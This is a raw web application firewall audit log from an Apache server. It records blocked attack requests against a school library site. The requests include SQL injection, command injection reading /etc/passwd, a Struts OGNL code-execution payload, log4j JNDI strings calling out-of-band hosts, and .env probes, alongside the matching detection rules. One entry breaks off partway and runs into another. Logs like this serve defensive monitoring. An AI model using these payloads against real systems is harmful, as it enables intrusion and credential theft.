?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748284164120982 3528 (- - -) Stopwatch2: 1748284164120982 3528; combined=1807, p1=467, p2=1310, p3=0, p4=0, p5=30, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62cd3267-Z-- --6f489f10-A-- [27/May/2025:01:31:46 +0700] aDSzknFOzWd_Ai7zJXUkMAAAAAQ 103.236.140.4 56602 103.236.140.4 8181 --6f489f10-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/620.30 (KHTML, like Gecko) Version/17.0 Safari/620.30 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159436057 --6f489f10-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6f489f10-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284306123205 2706 (- - -) Stopwatch2: 1748284306123205 2706; combined=1146, p1=386, p2=734, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f489f10-Z-- --214aa10b-A-- [27/May/2025:01:31:49 +0700] aDSzlXFOzWd_Ai7zJXUkMgAAAAI 103.236.140.4 56602 103.236.140.4 8181 --214aa10b-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168852924 --214aa10b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --214aa10b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284309098820 2091 (- - -) Stopwatch2: 1748284309098820 2091; combined=1230, p1=327, p2=882, p3=0, p4=0, p5=21, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --214aa10b-Z-- --e93a0552-A-- [27/May/2025:01:34:20 +0700] aDS0LM-W3hHsdQpQwdTafQAAAMc 103.236.140.4 60864 103.236.140.4 8181 --e93a0552-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 146.190.103.103 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e93a0552-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e93a0552-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748284460430361 777 (- - -) Stopwatch2: 1748284460430361 777; combined=273, p1=234, p2=0, p3=0, p4=0, p5=39, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e93a0552-Z-- --de2e3839-A-- [27/May/2025:01:39:14 +0700] aDS1Us-W3hHsdQpQwdTfZgAAANg 103.236.140.4 40852 103.236.140.4 8181 --de2e3839-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 159436077 --de2e3839-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --de2e3839-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de2e3839-E-- --de2e3839-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284754124029 2165 (- - -) Stopwatch2: 1748284754124029 2165; combined=761, p1=537, p2=194, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de2e3839-Z-- --4f6d7752-A-- [27/May/2025:01:40:12 +0700] aDS1jFSmKJQK-9oQ9STyhQAAAJI 103.236.140.4 42286 103.236.140.4 8181 --4f6d7752-B-- GET / HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())} Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163030780 --4f6d7752-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4f6d7752-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?:\\w+\\/[\\w\\-\\.]+)(?:;(?:charset=[\\w\\-]{1,18}|boundary=[\\w\\-]+)?)?$" against "REQUEST_HEADERS:Content-Type" required. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6743"] [id "243930"] [rev "2"] [msg "COMODO WAF: Remote code execution in Apache Struts versions 2.3.31 - 2.3.5 and 2.5 - 2.5.10 (CVE-2017-5638)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748284812601114 3769 (- - -) Stopwatch2: 1748284812601114 3769; combined=2450, p1=409, p2=2007, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f6d7752-Z-- --5dffa457-A-- [27/May/2025:01:40:12 +0700] aDS1jP7lSIOiZEhmvSz8HgAAAFI 103.236.140.4 42278 103.236.140.4 8181 --5dffa457-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 159436083 --5dffa457-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dffa457-E-- --5dffa457-H-- Message: Access denied with code 403 (phase 2). Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 168900306 --83854a08-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83854a08-E-- --83854a08-H-- Message: Access denied with code 403 (phase 2). Pattern match " HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --04a5eb6e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --04a5eb6e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748290163312300 5915 (- - -) Stopwatch2: 1748290163312300 5915; combined=3957, p1=740, p2=3083, p3=36, p4=66, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04a5eb6e-Z-- --c040c073-A-- [27/May/2025:03:11:01 +0700] aDTK1XFOzWd_Ai7zJXVrAAAAABQ 103.236.140.4 56224 103.236.140.4 8181 --c040c073-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.172.254.53 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.172.254.53 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c040c073-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c040c073-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748290261014304 752 (- - -) Stopwatch2: 1748290261014304 752; combined=310, p1=269, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c040c073-Z-- --b347c438-A-- [27/May/2025:03:19:44 +0700] aDTM4M-W3hHsdQpQwdRLggAAANI 103.236.140.4 42502 103.236.140.4 8181 --b347c438-B-- GET /?x=${jndi:ldap://${:-359}${:-857}.${hostName}.uri.d0q9cd1gpeook7mlf7sg9d1u1yeuuybph.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620101 --b347c438-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b347c438-E-- --b347c438-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748290784118941 8687 (- - -) Stopwatch2: 1748290784118941 8687; combined=6910, p1=460, p2=6406, p3=0, p4=0, p5=44, sr=55, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b347c438-Z-- --3c37f169-A-- [27/May/2025:03:19:48 +0700] aDTM5M-W3hHsdQpQwdRLkAAAAMg 103.236.140.4 42502 103.236.140.4 8181 --3c37f169-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-359}${:-857}.${hostName}.referer.d0q9cd1gpeook7mlf7sgz88jhr3egsyt3.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-359}${:-857}.${hostName}.useragent.d0q9cd1gpeook7mlf7sgqwr5ezopxz8e6.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-359}${:-857}.${hostName}.accept.d0q9cd1gpeook7mlf7sgdksanjt447dun.oast.live} Accept-Language: ${jndi:ldap://${:-359}${:-857}.${hostName}.acceptlanguage.d0q9cd1gpeook7mlf7sgemyouoa35a8fc.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-359}${:-857}.${hostName}.accesscontrolrequestheaders.d0q9cd1gpeook7mlf7sgbb5tpcd6uomfh.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-359}${:-857}.${hostName}.accesscontrolrequestmethod.d0q9cd1gpeook7mlf7sghjhbwihtweo1a.oast.live} Authentication: Bearer ${jndi:ldap://${:-359}${:-857}.${hostName}.authenticationbearer.d0q9cd1gpeook7mlf7sg7qxsjif1pw6g7.oast.live} Location: ${jndi:ldap://${:-359}${:-857}.${hostName}.location.d0q9cd1gpeook7mlf7sgsoirkz3ehenuk.oast.live} Origin: ${jndi:ldap://${:-359}${:-857}.${hostName}.origin.d0q9cd1gpeook7mlf7sgsqrc1p6cq6x4u.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-359}${:-857}.${hostName}.upgradeinsecurerequests.d0q9cd1gpeook7mlf7sg7u8tuj7hnb5oc.oast.live} X-Api-Version: ${jndi:ldap://${:-359}${:-857}.${hostName}.xapiversion.d0q9cd1gpeook7mlf7sgh4gxhq6xbxoro.oast.live} X-CSRF-Token: ${jndi:ldap://${:-359}${:-857}.${hostName}.xcsrftoken.d0q9cd1gpeook7mlf7sgp9ebuiuckg8nd.oast.live} X-Druid-Comment: ${jndi:ldap://${:-359}${:-857}.${hostName}.xdruidcomment.d0q9cd1gpeook7mlf7sgh9tr6sps1dawq.oast.live} X-Origin: ${jndi:ldap://${:-359}${:-857}.${hostName}.xorigin.d0q9cd1gpeook7mlf7sgq6bzkgb3yzu4r.oast.live} Cookie: ${jndi:ldap://${:-359}${:-857}.${hostName}.cookiename.d0q9cd1gpeook7mlf7sgn7xwozianz41i.oast.live}=${jndi:ldap://${:-359}${:-857}.${hostName}.cookievalue.d0q9cd1gpeook7mlf7sguoggfbk19i5kh.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620104 --3c37f169-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3c37f169-E-- --3c37f169-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748290788100290 4525 (- - -) Stopwatch2: 1748290788100290 4525; combined=3475, p1=453, p2=2999, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c37f169-Z-- --749bdb23-A-- [27/May/2025:03:39:07 +0700] aDTRa8-W3hHsdQpQwdRZGQAAAMg 103.236.140.4 45744 103.236.140.4 8181 --749bdb23-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 163090568 --749bdb23-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --749bdb23-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --749bdb23-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748291947118398 4341 (- - -) Stopwatch2: 1748291947118398 4341; combined=2730, p1=470, p2=2185, p3=23, p4=28, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --749bdb23-Z-- --645e244a-A-- [27/May/2025:03:39:20 +0700] aDTReFSmKJQK-9oQ9SRPvgAAAJU 103.236.140.4 46150 103.236.140.4 8181 --645e244a-B-- GET /?x=${jndi:ldap://${:-359}${:-857}.${hostName}.uri.d0q9cd1gpeook7mlf7sgj5984xj3d7h81.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163090586 --645e244a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --645e244a-E-- --645e244a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748291960115564 4846 (- - -) Stopwatch2: 1748291960115564 4846; combined=3272, p1=423, p2=2808, p3=0, p4=0, p5=41, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --645e244a-Z-- --3bf32953-A-- [27/May/2025:03:39:25 +0700] aDTRff7lSIOiZEhmvSxXXgAAAEs 103.236.140.4 46310 103.236.140.4 8181 --3bf32953-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-359}${:-857}.${hostName}.referer.d0q9cd1gpeook7mlf7sgn739rqqaoujuw.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-359}${:-857}.${hostName}.useragent.d0q9cd1gpeook7mlf7sgc5fsc3stu489u.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-359}${:-857}.${hostName}.accept.d0q9cd1gpeook7mlf7sgdhxjg53nnambg.oast.live} Accept-Language: ${jndi:ldap://${:-359}${:-857}.${hostName}.acceptlanguage.d0q9cd1gpeook7mlf7sgzdqwjumscb5ug.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-359}${:-857}.${hostName}.accesscontrolrequestheaders.d0q9cd1gpeook7mlf7sg4z3ds4wu4dr45.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-359}${:-857}.${hostName}.accesscontrolrequestmethod.d0q9cd1gpeook7mlf7sg8ecm75zsdu1jf.oast.live} Authentication: Bearer ${jndi:ldap://${:-359}${:-857}.${hostName}.authenticationbearer.d0q9cd1gpeook7mlf7sgi8757d38r5go3.oast.live} Location: ${jndi:ldap://${:-359}${:-857}.${hostName}.location.d0q9cd1gpeook7mlf7sg5p6y7e3z9dgsc.oast.live} Origin: ${jndi:ldap://${:-359}${:-857}.${hostName}.origin.d0q9cd1gpeook7mlf7sgj8mt3skor4z5z.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-359}${:-857}.${hostName}.upgradeinsecurerequests.d0q9cd1gpeook7mlf7sgqch5njbf6cz3w.oast.live} X-Api-Version: ${jndi:ldap://${:-359}${:-857}.${hostName}.xapiversion.d0q9cd1gpeook7mlf7sgtyhis3aeuacdo.oast.live} X-CSRF-Token: ${jndi:ldap://${:-359}${:-857}.${hostName}.xcsrftoken.d0q9cd1gpeook7mlf7sgn818nhfq8qhra.oast.live} X-Druid-Comment: ${jndi:ldap://${:-359}${:-857}.${hostName}.xdruidcomment.d0q9cd1gpeook7mlf7sgw61pm6gqk6rs1.oast.live} X-Origin: ${jndi:ldap://${:-359}${:-857}.${hostName}.xorigin.d0q9cd1gpeook7mlf7sgm8r66yzjshwfw.oast.live} Cookie: ${jndi:ldap://${:-359}${:-857}.${hostName}.cookiename.d0q9cd1gpeook7mlf7sgoages99sajf7o.oast.live}=${jndi:ldap://${:-359}${:-857}.${hostName}.cookievalue.d0q9cd1gpeook7mlf7sg8oh61myc31rsb.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168967279 --3bf32953-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3bf32953-E-- --3bf32953-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748291965121408 4059 (- - -) Stopwatch2: 1748291965121408 4059; combined=2834, p1=286, 